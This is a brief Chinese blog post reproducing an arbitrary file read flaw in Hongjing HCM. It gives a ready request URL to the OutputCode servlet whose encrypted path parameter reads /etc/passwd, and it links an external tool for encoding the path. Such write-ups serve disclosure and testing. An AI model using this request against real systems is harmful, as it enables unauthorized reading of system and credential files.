宏景HCM 任意檔案讀取漏洞

都吃泡芙發表於2024-06-12

漏洞復現:

1、讀取/etc/passwd
http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

其中path欄位加密透過下面工具來實現

工具地址:https://github.com/wafinfo/DecryptTools

image

讀取成功

image

相關文章